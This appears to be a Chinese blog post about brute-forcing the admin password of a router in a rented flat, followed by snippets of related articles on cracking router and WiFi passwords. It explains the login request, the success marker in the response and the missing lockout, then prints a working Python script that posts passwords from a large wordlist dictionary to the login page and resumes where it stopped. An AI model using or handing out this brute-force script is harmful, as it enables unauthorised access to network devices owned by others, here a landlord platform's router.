已實現 暴力破解路由器管理密碼

2021-10-07 04:00:04 字數 2900 閱讀 4943

自搬新家以後,第一時間連上網路,登入路由器後台。 博主租的房子是某平台的,網路是由平台提供的。和上次租房不同的地方在於,這次路由器後台管理密碼居然和給的wifi連線密碼不一樣了,肯定是有人改過密碼了!admin 等弱口令都試過了,全都不管用!對乙個it技術人員來說,被人掌握網路生殺大權肯定是無法容忍的!

第一次測試的時候嘗試用telnet登入路由器,發現密碼已經被更改,無法登入,預料是跟web控制台密碼一起改變的。

沒有辦法只能去研究web登入介面。

要暴力破解的話,我們需要用**去構造http請求,因此我們要具備以下條件:

1.登入請求的位址是多少

2.請求格式是怎麼樣的

3.登入成功以後改如何判斷

4.有沒有對暴力破解做黑名單限制(有的話我們需要更改mac位址)

5.暴力破解的字典

話不多說趕緊去嘗試

network如下,很明顯的同步提交 。了解http的都知道同步表當提交表單data放在body裡,以 [引數名]=[值]的形數存放到

這裡我們構造請求的請求位址,引數都有了。 

然後我們去判斷一下怎麼會彈出錯誤提示的:

因為是同步提交,其實本質上是對頁面的跳轉,很明顯html內容就在response裡面,

ctrl+f 一把找到了密碼錯誤的js ,可以看到 checkpsdflag是關鍵checkpsdflag='flase'。

彈出來的密碼錯誤,在往上面看'true'==checkpsdflag 是登入成功。

神奇的地方在於checkpsdflag是resultinfo字串擷取出來的 。

那豈不是這個頁面永遠都是登入失敗?  沒錯!

記得上面所說的麼,這個是同步請求 。因此我懷疑 resultinfo是後台**渲染出來的,

失敗的時候是var resultinfo="false;0"; 成功的時候是var resultinfo="true;0";

證據在下面:當三次登入失敗以後,再重新整理這個頁面:

所以登入成功的條件就是 返回的html裡面存在 var resultinfo="true;0";

據我研究這個頁面沒有記錄登入測試,連登入次數都是記錄在cookie裡的,算是比較幼稚的**(。≖ˇェˇ≖。)

所以就犯不著修改實體地址去欺騙路由器了。直接暴力破解。

於是寫了一段python**[比較隨意寫的,只為了破解,就沒特意封裝  ( ᖛ ̫ ᖛ )ʃ)]

字典比較大,所以遍歷檔案的時候有個跳過多少行引數[這樣今天破解不完 下次直接跳過上次已經讀過的行繼續往下破解就好了]

# -*- coding: utf-8 -*-

import requests

from itertools import islice

import sys

headers =

def post(passwd):

data="psd="+passwd

res = requests.post(url=""

,data=data,headers=headers)

if('var resultinfo="true;0";' in res.text):

return true

else:

return false

def record(content):

with open("e:/work/36.4gb-18_in_1.lst/passwd.txt", 'w') as file:

file.write(content)

def readdic(skip):

linenum = skip - 1

with open("e:/work/36.4gb-18_in_1.lst/18_in_1.lst", 'r') as file:

for line in islice(file,skip,none):

linenum = linenum+1

line=line.replace('\n',"")

res=post(line)

print(str(linenum)+" "+line+" "+str(res), end="|")

if(res):

print("found!")

record("found! "+str(linenum)+" "+line+" "+str(res))

break

if(linenum%1000 == 0):

record(str(linenum)+" "+line+" "+str(res))

if __name__ == "__main__":

readdic(0)

然後就可以開始破解了:

記錄著 行號 密碼 結果

最後貼下路由器返回頁面的原始碼ฅ•ﻌ•ฅ

路由器密碼忘記 五步暴力破解

解答 很多時候我們家庭使用者網路被入侵或者日常使用過程中都會遇到密碼猜解的問題,家庭寬頻路由器的密碼遺忘而又無法通過其他辦法恢復的話,暴力破解方法是唯一的選擇。但是從以往的經驗來看暴力破解密碼工程龐大,所需要的時間非常長,小則幾十小時多則幾天,而且成功率還不高。不過就筆者長期經驗來說如果我們要破解的...

破解路由器密碼

最近很多人問我怎麼破解wifi密碼 看來大家都對免費的東西比較有興趣。要麼也可能是我太招搖了 囧 好吧,我就寫篇小小的教程,看完後,你應該能夠破解大部分無線路由器密碼了,寫這個教程也是為了加強大家對無線網路安全性的重視,後面也有簡單的防破解的辦法。好了,正式開始。首先,你需要的工具 軟體 backt...

暴力破解WiFi密碼python實現pywifi

最近在b站上看到了乙個有意思的wifi密碼破解,是暴力破解方法,雖然沒啥用,不過也能用它來做自動化來對筆記本上的wifi網絡卡進行一些管理import pywifi from pywifi import const 應用一些常量模組 建立乙個無線物件 wifi pywifi.pywifi 收穫第乙個...